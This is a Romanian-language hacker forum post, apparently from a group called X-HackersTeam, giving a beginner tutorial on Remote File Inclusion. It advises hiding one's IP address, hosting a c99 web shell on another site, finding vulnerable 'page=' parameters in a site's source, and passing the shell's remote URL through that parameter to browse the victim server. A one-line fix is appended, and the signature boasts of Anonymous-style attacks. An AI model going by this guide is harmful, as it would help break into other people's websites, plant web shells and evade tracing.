Ne-am mutat pe xhackers.4umer.com
Ne-am mutat pe xhackers.4umer.com
|
Nou pe simpatie: crazygirl
 | Femeie 24 ani Buzau cauta Barbat 26 - 80 ani |
|
|
Ne-am mutat pe xhackers.4umer.comReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
|
|
Este o metoda foarte cunoscuta , dar am facut acest tutorial pentru a intelege orice incepator din acest domeniu .
..::RFI - Remote File Inclusion::.. =================================== In primul rand avem nevoie de : 1.Un hide ip - recomand aol. Pentru a vedea daca ip-ul real a fost "inlocuit" folositi http://whatismyip.org/ 2.Un site unde sa avem urcat shellul. ( recomand c99 , este mai usor de navigat ) =================================== Aceasta vulnerabilitate afecteaza index.php . In index.php vulnerabilitate este urmatoarea: " require($page . “pagina.php”); " Exemplu: Avem siteul urmator: http://test.com/index.php , pentru a gasi "RFI-ul" va trebui sa ne uitam in sursa paginii . Click dreapta - View Page Source , apasam Ctrl+F si cautam ceva de genu : index.php? Sa zicem ca am gasit index.php?page=2. Pentru a testa daca siteul este vulnerabil vom reforumula link-ul , exemplu : http://test.com/index.php?page=http://s ... ro/c99.txt? - Press Enter Posted Image Daca siteul nostru test.com este vulnerabil vom putea naviga prin directoarele dupa server . ==================================== Cum "reparam" aceasta vulnerabilitate ?
Cum am spus si mai sus : in index.php vulnerabilitatea este : require($page. "pagina.php"); Pentru a repara bugul va trebui sa stergem "$page." , exemplu : require("pagina.php"); =====================================
_______________________________________ We are Anonymous! We are legion! Wait for us! We X-HackersTeam! We have the power! We want respect! X-HackersTeam is Anonymous EXPECT US !

|
|
| |
|